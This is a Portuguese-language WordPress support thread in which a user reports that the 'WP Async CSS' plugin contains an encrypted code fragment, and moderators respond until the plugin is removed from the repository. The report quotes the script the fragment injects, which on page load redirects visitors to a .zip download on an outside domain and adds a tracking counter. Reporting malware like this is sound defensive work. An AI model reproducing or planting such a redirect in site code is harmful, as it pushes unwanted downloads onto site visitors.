Suporte » Ajustando o WordPress » Malware em plugin by WordPress

  • Resolvido da Silva

    (@da-silva)


    Malware hosted by WordPress?

    Não tenho certeza se estou postando no local correto, porem quero relatar que usei o plugin “WP Async CSS” disponível na url https://downloads.wordpress.org/plugin/wp-async-css.1.2.zip e fiquei surpreso ao descobrir que o arquivo “wp-async-css.php” na linha 315 tem um fragmanto de código encriptado. Até aqui tudo bem.

    Porem fiquei frustrado ao notar que, após ativar o referido plugin, foi adicionado o seguinte código javascript:

    
    <script type="text/javascript">
        window.onload = function(){
         document.location = 'http://ibuyitttttttttttttttttttttttttttttttttttibuyit.com/xxx.zip';
        }</script> </head><body><body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <br><br><center> <img src="http://cb.amazingcounters.com/counter.php?i=2045070&c=6135523" width="686" height="108" /></a></center>

    Ao excluir o trecho de código da 315 o javascript para de carregar.
    Como não sou programador e conheço pouco sobre o WordPress, peço que alguém com mais experiência, se possível, verificar e solicitar a correção do referido arquivo.

Visualizando 4 respostas - 1 até 4 (de um total de 4)
  • Moderador Mário Valney

    (@mariovalney)

    WordPress Cleric of Fire

    Olá @da-silva, tudo bem?

    Antes de mais nada gostaria de agradecer o contato.
    Vou analisar mais a fundo e levantar a questão no Slack da comunidade.

    UPDATE:

    Conversei com o pessoal e além de não parecer com um botão de doação normal do PayPal o link parece ter alguma espécie de tracking, o que é contra as regras do Repositório Oficial.

    Sendo assim, recomendo que remova o plugin e procure outra solução.

    Além disso, gostaria de agradecer novamente pelo report.

    Abraços

    • Esta resposta foi modificada 2 years, 6 months atrás por Mário Valney.

    Olá @mariovalney

    Agradeço pela orientação.
    Como mencionado, acima, basta remover o referido código na linha 315 que o plugin é funcional.

    Esse plugin tem mais de 2.000 instalações ativas.
    Existe algum plano de notificar/alertar esses +2.000 usuários que instalaram o plugin?

    Lembrando que poderíamos considerar a possibilidade do desenvolvedor do plugin também ser vítima.

    Moderador Mário Valney

    (@mariovalney)

    WordPress Cleric of Fire

    @da-silva sinceramente eu não confiaria utilizar um código externo (criado por outra pessoa) com esse tipo de dúvida. Por isso indiquei substituir o plugin.

    Sobre as providências a serem tomadas sobre o plugin, se for constatado que viola as políticas do Fórum, não sei te informar com certeza. Porém, comuniquei o pessoal do repositório via e-mail e assim que tiver alguma devolutiva deles eu te conto por aqui.

    Abraços

    Moderador Mário Valney

    (@mariovalney)

    WordPress Cleric of Fire

    Opa @da-silva, tudo bem?

    O plugin foi removido do repositório.

Visualizando 4 respostas - 1 até 4 (de um total de 4)
  • O tópico ‘Malware em plugin by WordPress’ está fechado para novas respostas.